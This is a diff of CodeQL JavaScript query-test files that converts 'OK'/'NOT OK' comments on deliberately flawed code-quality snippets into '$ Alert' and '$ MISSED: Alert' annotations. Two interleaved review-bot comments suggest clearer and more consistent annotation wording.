+!method in obj; // $ Alert + -// OK !(method in obj); -// OK + '__proto__' in obj; -// OK + 0 in obj; -// OK + ('$' + key) in obj; -// NOT OK -p in null; +p in null; // $ Alert + +0 in 'string'; // $ Alert -// NOT OK -0 in 'string'; -// OK p in {}; -// NOT OK -console.log("Setting device's bluetooth name to '%s'" % device_name); +console.log("Setting device's bluetooth name to '%s'" % device_name); // $ Alert -// NOT OK -if (!callback || !callback instanceof Function) { +if (!callback || !callback instanceof Function) { // $ Alert ; } -// OK + function cmp(x, y) { return (x > y) - (x < y); } -// OK + function cmp(x, y) { if (x > y) return 1; 
@@ -44,48 +39,42 @@ function cmp(x, y) { return 0; } -// OK + function cmp(x, y) { return (x > y) - (x < y); } -// NOT OK -1 + void 0 +1 + void 0 // $ Alert + -// OK o[true] = 42; function f() { var x; - // NOT OK - x -= 2; + x -= 2; // $ Alert } function g() { var x = 19, y; - // NOT OK - x %= y; + x %= y; // $ Alert } function h() { var x; - // NOT OK - ++x; + ++x; // $ Alert } function k() { var name; - // NOT OK - return `Hello ${name}!`; + return `Hello ${name}!`; // $ Alert } function l() { var x; - // NOT OK - x ** 2; + x ** 2; // $ Alert } -1n + 1; // NOT OK, but not currently flagged +1n + 1; // $ MISSED: Alert (function(){ let sum = 0; @@ -114,10 +103,10 @@ function l() { function m() { var x = 19, y = "string"; - x %= y; // NOT OK - x += y; // OK - x ||= y; // OK - x &&= y; // OK - x ??= y; // OK - x >>>= y; // NOT OK + x %= y; // $ Alert + x += y; + x ||= y; + x &&= y; + x ??= y; + x >>>= y; // $ Alert } diff --git a/javascript/ql/test/query-tests/Expressions/MissingAwait/tsTest.ts b/javascript/ql/test/query-tests/Expressions/MissingAwait/tsTest.ts index 4362c11a8e67..5f1774f1ab56 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingAwait/tsTest.ts +++ b/javascript/ql/test/query-tests/Expressions/MissingAwait/tsTest.ts @@ -1,5 +1,5 @@ declare let cache: { [x: string]: Promise }; function deleteCache(x: string) { - delete cache[x]; // OK + delete cache[x]; } diff --git a/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js b/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js index 10fc244dbc44..28e95513d401 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js +++ b/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js 
@@ -5,24 +5,24 @@ async function getThing() { function useThing() { let thing = getThing(); - if (thing === undefined) {} // NOT OK + if (thing === undefined) {} // $ Alert - if (thing == null) {} // NOT OK + if (thing == null) {} // $ Alert - something(thing ? 1 : 2); // NOT OK + something(thing ? 1 : 2); // $ Alert - for (let x in thing) { // NOT OK + for (let x in thing) { // $ Alert something(x); } let obj = something(); - something(obj[thing]); // NOT OK - obj[thing] = 5; // NOT OK + something(obj[thing]); // $ Alert + obj[thing] = 5; // $ Alert - something(thing + "bar"); // NOT OK + something(thing + "bar"); // $ Alert if (something()) { - if (thing) { // NOT OK + if (thing) { // $ Alert something(3); } } @@ -31,21 +31,21 @@ function useThing() { async function useThingCorrectly() { let thing = await getThing(); - if (thing === undefined) {} // OK + if (thing === undefined) {} - if (thing == null) {} // OK + if (thing == null) {} - return thing + "bar"; // OK + return thing + "bar"; } async function useThingCorrectly2() { let thing = getThing(); - if (await thing === undefined) {} // OK + if (await thing === undefined) {} - if (await thing == null) {} // OK + if (await thing == null) {} - return thing + "bar"; // NOT OK + return thing + "bar"; // $ Alert } function getThingSync() { @@ -55,21 +55,21 @@ function getThingSync() { function useThingPossiblySync(b) { let thing = b ? getThing() : getThingSync(); - if (thing === undefined) {} // OK + if (thing === undefined) {} - if (thing == null) {} // OK + if (thing == null) {} - return thing + "bar"; // NOT OK - but we don't flag it + return thing + "bar"; // $ MISSED: Alert } function useThingInVoid() { - void getThing(); // OK + void getThing(); } function useThing() { if (random()) { - return getThing() ?? null; // NOT OK + return getThing() ?? null; // $ Alert } else { - return getThing?.() ?? null; // OK + return getThing?.() ?? null; } -} \ No newline at end of file +} 
diff --git a/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.js b/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.js index cbfe6d3250e5..d12e82cb8c24 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.js +++ b/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.js @@ -1,6 +1,6 @@ function total(bad) { var sum = 0 - for (var i = 0; i < bad; ++i) { // NOT OK + for (var i = 0; i < bad; ++i) { // $ Alert sum += bad[i] } return sum @@ -8,7 +8,7 @@ function total(bad) { function total_good(good) { var sum = 0 - for (var i = 0; i < good.length; ++i) { // OK + for (var i = 0; i < good.length; ++i) { sum += good[i] } return sum @@ -17,21 +17,21 @@ function total_good(good) { var fruits = ["banana", "pineapple"] function mix() { var drink = [] - for (var i = 0; i < fruits; ++i) { // NOT OK + for (var i = 0; i < fruits; ++i) { // $ Alert drink.push(fruits[i]) } } function mix_good() { var drink = [] - for (var i = 0; i < fruits.length; ++i) { // OK + for (var i = 0; i < fruits.length; ++i) { drink.push(fruits[i]) } } function overloaded(mode, foo, bar) { if (mode == "floo") { - return foo < bar; // OK + return foo < bar; } else if (mode == "blar") { return foo[bar]; } else { @@ -41,7 +41,7 @@ function overloaded(mode, foo, bar) { function overloaded_no_else(mode, foo, bar) { if (mode == "floo") { - return foo < bar; // OK + return foo < bar; } if (mode == "blar") { return foo[bar]; @@ -50,7 +50,7 @@ function overloaded_no_else(mode, foo, bar) { function reassigned(index, object) { var tmp = object.getMaximum() - if (index < tmp) { // OK + if (index < tmp) { tmp = object.getArray() return tmp[index] } 
diff --git a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/tst.js b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/tst.js index 101c6b360b48..5016873b6a59 100644 --- a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/tst.js +++ b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/tst.js @@ -1,43 +1,40 @@ // use of .length to prime the query a.length; -// NOT OK -for (var i=0; i -
    // OK +
    } @@ -24,20 +24,20 @@ class Component1 extends React.Component { render() { var unbound3 = this.unbound3; return
    -
    // NOT OK -
    // NOT OK -
    // NOT OK -
    // OK -
    // OK -
    // OK -
    // OK -
    this.unbound_butInvokedSafely(e)}/> // OK -
    // OK -
    // OK -
    // OK -
    // OK -
    // OK -
    // OK +
    // $ Alert +
    // $ Alert +
    // $ Alert +
    +
    +
    +
    +
    this.unbound_butInvokedSafely(e)}/> +
    +
    +
    +
    +
    +
    } @@ -125,7 +125,7 @@ class Component2 extends React.Component { render() { return
    -
    // OK +
    ; } @@ -139,7 +139,7 @@ class Component3 extends React.Component { render() { return
    -
    // OK +
    } @@ -159,7 +159,7 @@ class Component4 extends React.Component { render() { return
    -
    // OK +
    } @@ -177,7 +177,7 @@ class Component5 extends React.Component { render() { return
    -
    // OK +
    } diff --git a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.js b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.js index 5490b0b4232a..9aa369d69b21 100644 --- a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.js +++ b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.js @@ -1,10 +1,10 @@ -x.f() & 0x0A != 0; // NOT OK -x.f() & (0x0A != 0); // OK -x.f() & 0x0A != 0; // OK -x.f() & 0x0A!=0; // OK +x.f() & 0x0A != 0; // $ Alert +x.f() & (0x0A != 0); +x.f() & 0x0A != 0; +x.f() & 0x0A!=0; -x !== y & 1; // NOT OK +x !== y & 1; // $ Alert -x > 0 & x < 10; // OK +x > 0 & x < 10; -a&b==c; // NOT OK +a&b==c; // $ Alert diff --git a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.min.js b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.min.js index 800b7b08df2c..d39838870c81 100644 --- a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.min.js +++ b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.min.js @@ -1 +1 @@ -a&b==c; // OK (minified file) +a&b==c; // OK - minified file diff --git a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.html b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.html index 87f969c3e179..03ac0651186e 100644 --- a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.html +++ b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.html @@ -1,6 +1,6 @@ - - - + + + diff --git a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js index 0645f8821a1d..f958714431d6 100644 --- a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js +++ b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js 
@@ -1,51 +1,51 @@ -"use foo"; // NOT OK -"use strict"; // NOT OK +"use foo"; // $ Alert +"use strict"; // $ Alert function bad() { - "'use strict'"; // NOT OK - "use strict;"; // NOT OK - "'use strict';"; // NOT OK - "'use strict;'"; // NOT OK - "use-strict"; // NOT OK - "use_strict"; // NOT OK - "uses strict"; // NOT OK - "use struct;" // NOT OK - "Use Strict"; // NOT OK - "use bar"; // NOT OK + "'use strict'"; // $ Alert + "use strict;"; // $ Alert + "'use strict';"; // $ Alert + "'use strict;'"; // $ Alert + "use-strict"; // $ Alert + "use_strict"; // $ Alert + "uses strict"; // $ Alert + "use struct;" // $ Alert + "Use Strict"; // $ Alert + "use bar"; // $ Alert } function ignored() { var x = 42; - "use baz"; // OK: not a directive, positionally + "use baz"; // OK - not a directive, positionally } function good() { - "use strict"; // OK - "use asm"; // OK - "use babel"; // OK - "use 6to5"; // OK - "format cjs" // OK - "format esm"; // OK - "format global"; // OK - "format register"; // OK - "ngInject"; // OK - "ngNoInject"; // OK - "deps foo"; // OK - "deps bar"; // OK - "use server"; // OK - "use client"; // OK + "use strict"; + "use asm"; + "use babel"; + "use 6to5"; + "format cjs" + "format esm"; + "format global"; + "format register"; + "ngInject"; + "ngNoInject"; + "deps foo"; + "deps bar"; + "use server"; + "use client"; } function data() { - "[0, 0, 0];"; // NOT OK - "[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0];"; // NOT OK + "[0, 0, 0];"; // $ Alert + "[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0];"; // $ Alert } function yui() { - "foo:nomunge"; // OK - "bar:nomunge, baz:nomunge,qux:nomunge"; // OK - ":nomunge"; // NOT OK - "foo(), bar, baz:nomunge"; // NOT OK + "foo:nomunge"; + "bar:nomunge, baz:nomunge,qux:nomunge"; + ":nomunge"; // $ Alert + "foo(), bar, baz:nomunge"; // $ Alert } function babel_typeof(obj) { 
diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/global-module-definition.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/global-module-definition.js index 8c61f38d1132..30f28719a2b7 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/global-module-definition.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/global-module-definition.js @@ -7,5 +7,5 @@ var Mod1; var Mod2; (function (Mod2) { Mod2.p = 42; - })(Mod2 || (Mod2 = {})); // NOT OK + })(Mod2 || (Mod2 = {})); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/module-environment-detection.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/module-environment-detection.js index 913684d6f6aa..a59cc7abb9e8 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/module-environment-detection.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/module-environment-detection.js @@ -20,5 +20,5 @@ if (typeof exports !== 'undefined') { (function(){ var module; - if(typeof module === 'undefined'); // NOT OK + if(typeof module === 'undefined'); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/regression.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/regression.js index cfc6f1e6df71..3807082c7434 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/regression.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/regression.js 
@@ -6,10 +6,10 @@ function getDate() { return null; } console.log(date); - return date && date.getTime(); // NOT OK + return date && date.getTime(); // $ Alert } function isNotNullOrString(obj) { - return obj != null && obj != undefined && // NOT OK + return obj != null && obj != undefined && // $ Alert typeof obj != 'string'; } diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst.js index ace5a3dd7ac8..c036953b01eb 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst.js 
@@ -10,95 +10,95 @@ var o_ = o; var x_ = x; - u_ = u_ || e; // NOT OK - n_ = n_ || e; // NOT OK - o_ = o_ || e; // NOT OK + u_ = u_ || e; // $ Alert + n_ = n_ || e; // $ Alert + o_ = o_ || e; // $ Alert x_ = x_ || e; - u && u.p; // NOT OK - n && n.p; // NOT OK - o && o.p; // NOT OK + u && u.p; // $ Alert + n && n.p; // $ Alert + o && o.p; // $ Alert x && x.p; - u && u(); // NOT OK - n && n(); // NOT OK - o && o(); // NOT OK + u && u(); // $ Alert + n && n(); // $ Alert + o && o(); // $ Alert x && x(); - !u || u.p; // NOT OK - !n || n.p; // NOT OK - !o || o.p; // NOT OK + !u || u.p; // $ Alert + !n || n.p; // $ Alert + !o || o.p; // $ Alert !x || x.p; - !!u && u.p; // NOT OK - !!n && n.p; // NOT OK - !!o && o.p; // NOT OK + !!u && u.p; // $ Alert + !!n && n.p; // $ Alert + !!o && o.p; // $ Alert !!x && x.p; - u != undefined && u.p; // NOT OK - n != undefined && n.p; // NOT OK - o != undefined && o.p; // NOT OK + u != undefined && u.p; // $ Alert + n != undefined && n.p; // $ Alert + o != undefined && o.p; // $ Alert x != undefined && x.p; - u == undefined || u.p; // NOT OK - n == undefined || n.p; // NOT OK - o == undefined || o.p; // NOT OK + u == undefined || u.p; // $ Alert + n == undefined || n.p; // $ Alert + o == undefined || o.p; // $ Alert x == undefined || x.p; - u === undefined || u.p; // NOT OK - n === undefined || n.p; // NOT OK - o === undefined || o.p; // NOT OK + u === undefined || u.p; // $ Alert + n === undefined || n.p; // $ Alert + o === undefined || o.p; // $ Alert x === undefined || x.p; - if (u) { // NOT OK + if (u) { // $ Alert u.p; } - if (n) { // NOT OK + if (n) { // $ Alert n.p; } - if (o) { // NOT OK + if (o) { // $ Alert o.p; } if (x) { x.p; } - u? u():_; // NOT OK - n? n(): _; // NOT OK - o? o(): _; // NOT OK + u? u():_; // $ Alert + n? n(): _; // $ Alert + o? o(): _; // $ Alert x? 
x(): _; - if (u !== undefined) { // NOT OK + if (u !== undefined) { // $ Alert u.p; } - if (n !== undefined) { // NOT OK + if (n !== undefined) { // $ Alert n.p; } - if (o !== undefined) { // NOT OK + if (o !== undefined) { // $ Alert o.p; } if (x !== undefined) { x.p; } - if (u == undefined){} // NOT OK - if (n == undefined){} // NOT OK - if (o == undefined){} // NOT OK + if (u == undefined){} // $ Alert + if (n == undefined){} // $ Alert + if (o == undefined){} // $ Alert if (x == undefined){} - if (u != undefined){} // NOT OK - if (n != undefined){} // NOT OK - if (o != undefined){} // NOT OK + if (u != undefined){} // $ Alert + if (n != undefined){} // $ Alert + if (o != undefined){} // $ Alert if (x != undefined){} - if (typeof u === "undefined"){} // NOT OK - if (typeof n === "undefined"){} // NOT OK - if (typeof o === "undefined"){} // NOT OK + if (typeof u === "undefined"){} // $ Alert + if (typeof n === "undefined"){} // $ Alert + if (typeof o === "undefined"){} // $ Alert if (typeof x === "undefined"){} function f() { } - typeof f === "function" && f(); // NOT OK - typeof u === "function" && u(); // NOT OK + typeof f === "function" && f(); // $ Alert + typeof u === "function" && u(); // $ Alert typeof x === "function" && x(); var empty_array = []; @@ -111,9 +111,9 @@ var _true = true; var _false = false; - empty_array && empty_array.pop(); // NOT OK - pseudo_empty_array && pseudo_empty_array.pop(); // NOT OK - non_empty_array && non_empty_array.pop(); // NOT OK + empty_array && empty_array.pop(); // $ Alert + pseudo_empty_array && pseudo_empty_array.pop(); // $ Alert + non_empty_array && non_empty_array.pop(); // $ Alert empty_string && empty_string.charAt(0); non_empty_string && non_empty_string.charAt(0); zero && zero(); 
@@ -121,23 +121,23 @@ _true && _true(); _false && _false(); - (u !== undefined && u !== null) && u.p; // NOT OK - u !== undefined && u !== null && u.p; // NOT OK + (u !== undefined && u !== null) && u.p; // $ Alert + u !== undefined && u !== null && u.p; // $ Alert - u != undefined && u != null; // NOT OK - u == undefined || u == null; // NOT OK - u !== undefined && u !== null; // NOT OK - !(u === undefined) && !(u === null); // NOT OK - u === undefined || u === null; // NOT OK - !(u === undefined || u === null); // NOT OK - !(u === undefined) && u !== null; // NOT OK + u != undefined && u != null; // $ Alert + u == undefined || u == null; // $ Alert + u !== undefined && u !== null; // $ Alert + !(u === undefined) && !(u === null); // $ Alert + u === undefined || u === null; // $ Alert + !(u === undefined || u === null); // $ Alert + !(u === undefined) && u !== null; // $ Alert u !== undefined && n !== null; - u == undefined && u == null; // NOT OK + u == undefined && u == null; // $ Alert x == undefined && x == null; - x === undefined && x === null; // NOT OK + x === undefined && x === null; // $ Alert if (x === undefined) { - if (x === null) { // NOT OK + if (x === null) { // $ Alert } } @@ -153,16 +153,16 @@ } } - x != undefined && x != null; // NOT OK + x != undefined && x != null; // $ Alert if (x != undefined) { - if (x != null) { // NOT OK + if (x != null) { // $ Alert } } if (typeof x !== undefined); if (typeof window !== undefined); if (typeof x !== x); - if (typeof x !== u); // NOT OK + if (typeof x !== u); // $ Alert if (typeof window !== "undefined"); if (typeof module !== "undefined"); @@ -174,8 +174,8 @@ u && (f(), u.p); u && (u.p, f()); // technically not OK, but it seems like an unlikely pattern - u && !u.p; // NOT OK - u && !u(); // NOT OK + u && !u.p; // $ Alert + u && !u(); // $ Alert function hasCallbacks(success, error) { 
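Review bot: In the `@@ -174,8 +174,8 @@` hunk of UnneededDefensiveProgramming/tst.js, the context line `u && (u.p, f()); // technically not OK, but it seems like an unlikely pattern` keeps its free-form comment. Other known misses in this commit were converted to the `// $ MISSED: Alert` form, for example `1n + 1;` in ImplicitOperandConversion/tst.js. If this line is meant to record an accepted miss, `u && (u.p, f()); // $ MISSED: Alert - unlikely pattern` would make that machine-checkable and consistent with the rest of the file. The enclosing function starts outside the hunk, so this assumes `u` is the same always-undefined variable used in the lines above.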
diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst2.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst2.js index 588844f9c75f..e10c2e0e04dd 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst2.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst2.js @@ -1,7 +1,7 @@ (function(){ var v; (function(){ - if(typeof v === "undefined"){ // NOT OK + if(typeof v === "undefined"){ // $ Alert v = 42; } for(var v in x){ @@ -9,10 +9,10 @@ }); }); -const isFalsyObject = (v) => typeof v === 'undefined' && v !== undefined; // OK +const isFalsyObject = (v) => typeof v === 'undefined' && v !== undefined; function f(v) { - if (typeof v === 'undefined' && v !== undefined) { // OK + if (typeof v === 'undefined' && v !== undefined) { doSomething(v); } } diff --git a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js index d9942a5ec4a8..f3f444fa86f7 100644 --- a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js +++ b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js @@ -42,14 +42,13 @@ function ok10(o, p) { return p in o&&o[p]; } -// OK + x==y ** 2; -// NOT OK -x + x >> 1 +x + x >> 1 // $ Alert + -// OK x + x >> 1 -// OK (asm.js-like) +// OK - asm.js-like x = x - 1|0; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/tst.js b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/tst.js index b785e06507a7..6143b7084c3b 100644 --- a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/tst.js +++ b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/tst.js 
@@ -1,9 +1,7 @@ /** - * NOT OK: Parameter y is not documented. - * * @param x The first operand. */ -function f(x, y) { +function f(x, y) { // $ Alert return x+y; } @@ -14,7 +12,6 @@ function g(x, y) { return x+y; } -// NOT OK /** * @param {int} x * @param {float} y @@ -23,6 +20,6 @@ var o = { /** * @param {String} x first argument. */ - f : function(x, y) { + f : function(x, y) { // $ Alert } }; diff --git a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/tst.js index de01c66ac808..a0fc28f09494 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/tst.js @@ -1,36 +1,33 @@ -// NOT OK -typeof a === 'array'; +typeof a === 'array'; // $ Alert + -// OK typeof b == 'string'; -// OK + typeof c != "string"; -// OK + "number" !== typeof 23; -// OK + 'object' == typeof null; -// OK + typeof es6 === 'symbol'; switch (typeof a) { -// OK + case 'undefined': -// NOT OK -case 'null': +case 'null': // $ Alert } -// OK + switch (msg) { case 'null': case typeof a: } -// NOT OK -(typeof a) === 'array'; +(typeof a) === 'array'; // $ Alert // JScript extensions typeof a === 'unknown' || typeof a === 'date'; diff --git a/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/tst.js index 69daffb8a0b0..cf64a97a4d10 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/tst.js @@ -1,7 +1,7 @@ -var a = [], // OK - b = [1], // OK - c = [1, 2], // OK - d = [1, , 2], // NOT OK - e = [1,], // OK - f = [1, 2, ,], // NOT OK - g = [,1]; // NOT OK +var a = [], + b = [1], + c = [1, 2], + d = [1, , 2], // $ Alert + e = [1,], + f = [1, 2, ,], // $ Alert + g = [,1]; // $ Alert 
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/tst.js index 202ea2a262a6..610590712eeb 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/tst.js @@ -1,8 +1,7 @@ -// NOT OK -[1, 2, 3].map(function(x) x * x); +[1, 2, 3].map(function(x) x * x); // $ Alert + -// OK [1, 2, 3].map(function(x) { return x * x; }); -// OK + [1, 2, 3].map((x) => x * x); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js index 3ed85a709341..1ffb7a489c8e 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js @@ -4,24 +4,24 @@ class C { class D extends C { constructor() { - super(); // OK + super(); } } -let c = new C(); // OK -C(); // NOT OK -new (x=>x); // NOT OK -c.m(); // OK -new c.m(); // NOT OK - but not flagged +let c = new C(); +C(); // $ Alert +new (x=>x); // $ Alert +c.m(); +new c.m(); // $ MISSED: Alert var o = { f: function() {}, g() {} }; -o.f(); // OK -new o.f(); // OK -o.g(); // OK -new o.g(); // NOT OK - but not flagged +o.f(); +new o.f(); +o.g(); +new o.g(); // $ MISSED: Alert function f(b) { var g; @@ -31,31 +31,31 @@ function f(b) { g = (() => {}); console.log(); if (!b) - g(); // OK + g(); else - new g(); // OK + new g(); } function* g() {} async function h() {} -new g() // NOT OK -new h() // NOT OK +new g() // $ Alert +new h() // $ Alert -C.call(); // NOT OK -C.apply(); // NOT OK +C.call(); // $ Alert +C.apply(); // $ Alert class E { static call() {} static apply() {} } -E.call(); // OK -E.apply(); // OK +E.call(); +E.apply(); function invoke(fn) { if (typeof fn === "function" && fn.hasOwnProperty("foo")) { - fn(); // OK + fn(); } } invoke(C); 
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a1.js b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a1.js index 1585d8add718..3ecf658e45c9 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a1.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a1.js @@ -1,3 +1,3 @@ function A() {} -new A(); // OK -String(""); // OK \ No newline at end of file +new A(); +String(""); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a2.js b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a2.js index 407b91aec013..1c9f2e07a49a 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a2.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a2.js @@ -1,6 +1,6 @@ function A() {} -A(); // OK +A(); function MyString() {} String = MyString; -new String(); // OK \ No newline at end of file +new String(); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/arraycalls.js b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/arraycalls.js index 6aaeaa7a9f18..a3477727286b 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/arraycalls.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/arraycalls.js @@ -1,2 +1,2 @@ -Array(45); // OK -new Array(45); // OK +Array(45); +new Array(45); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/tst.js index 56af21411b67..76ffbf8c155a 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/tst.js 
@@ -48,13 +48,13 @@ function RobustPoint4(x, y) { new RobustPoint4(23, 42); RobustPoint4(56, 72); -// OK: Error is an external function +// OK - Error is an external function new Error(); Error(); class C {} new C(); -C(); // NOT OK, but flagged by IllegalInvocation +C(); // OK - flagged by IllegalInvocation (function() { function A(x) { @@ -64,5 +64,5 @@ C(); // NOT OK, but flagged by IllegalInvocation A.call({}, 23); })(); -new Point(42, 23); // NOT OK, but not flagged since line 6 above was already flagged -Point(56, 72); // NOT OK, but not flagged since line 7 above was already flagged +new Point(42, 23); // OK - not flagged since line 6 above was already flagged +Point(56, 72); // OK - not flagged since line 7 above was already flagged diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/tst.js index 1015db92cff4..5c12a3b7d853 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/tst.js @@ -1,11 +1,11 @@ -var o1 = { __proto__: null }; // OK -Object.setPrototypeOf(o1, Function.prototype); // OK -Object.create(class{}); // OK -Function.prototype.isPrototypeOf(o1); // OK -o1.__proto__ = new Date(); // OK +var o1 = { __proto__: null }; +Object.setPrototypeOf(o1, Function.prototype); +Object.create(class{}); +Function.prototype.isPrototypeOf(o1); +o1.__proto__ = new Date(); -var o2 = { __proto__: undefined }; // NOT OK -Object.setPrototypeOf(o2, 42); // NOT OK -Object.create(true); // NOT OK -"function".isPrototypeOf(o2); // NOT OK +var o2 = { __proto__: undefined }; // $ Alert +Object.setPrototypeOf(o2, 42); // $ Alert +Object.create(true); // $ Alert +"function".isPrototypeOf(o2); // $ Alert 
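Review bot: In InconsistentNew/tst.js (hunks `@@ -48,13 +48,13 @@` and `@@ -64,5 +64,5 @@`) the rewritten comments on `C();`, `new Point(42, 23);` and `Point(56, 72);` now start with `OK`, although the old text called these calls `NOT OK` and only explained why this query stays silent. A comment like `// OK - flagged by IllegalInvocation` reads as if the code were fine, which contradicts its own reason. Wording that keeps both facts would be clearer, for example `C(); // no alert here - reported by IllegalInvocation instead`. The same applies to `null.bar = 23; undefined.baz = 42; // OK - already flagged by SuspiciousPropAccess.ql` in PropertyWriteOnPrimitive/tst.js. The two `Point` comments also refer to "line 6 above" and "line 7 above", which will go stale when the file is edited; naming the flagged calls would be more robust.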
